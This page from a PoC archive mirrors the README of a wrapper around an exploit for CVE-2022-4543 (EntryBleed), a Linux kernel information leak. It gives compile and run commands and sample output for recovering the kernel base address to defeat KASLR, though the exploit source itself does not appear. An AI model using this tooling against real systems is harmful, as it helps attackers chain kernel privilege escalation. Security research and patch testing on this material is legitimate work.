Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-4543 PoC — Linux kernel 信息泄露漏洞

Source
https://github.com/sunichi/cve-2022-4543-wrapper
Associated Vulnerability
Title:Linux kernel 信息泄露漏洞 (CVE-2022-4543)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在信息泄露漏洞。攻击者利用该漏洞读取Linux内核的内存片段,以获取敏感信息。
Readme
# cve-2022-4543-wrapper

## Introduction

This is a wrapper of willsroot's CVE-2022-4543 exploit to help you judge and get kernel base address.

## How to use

### Compile

Base on your demand(Optional):

```bash
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
```

For some OS, install static libc first.

### De-KASLR

```bash
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
```

```bash
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
```

After running both program, it will give you the most frequent address base on your offset.

In practice, the real kernel base address will appear more than 1/4 in total tries. Recommend more than 100 tries.

## References

- https://www.willsroot.io/2022/12/entrybleed.html
- https://access.redhat.com/security/cve/cve-2022-4543
File Snapshot

 [4.0K]  /data/pocs/fb0a46746d12a2756f0bec8d6249a23caaf87540
├── [2.2K]  dekaslr.c
├── [ 34K]  LICENSE
├── [2.0K]  main.cpp
└── [ 831]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.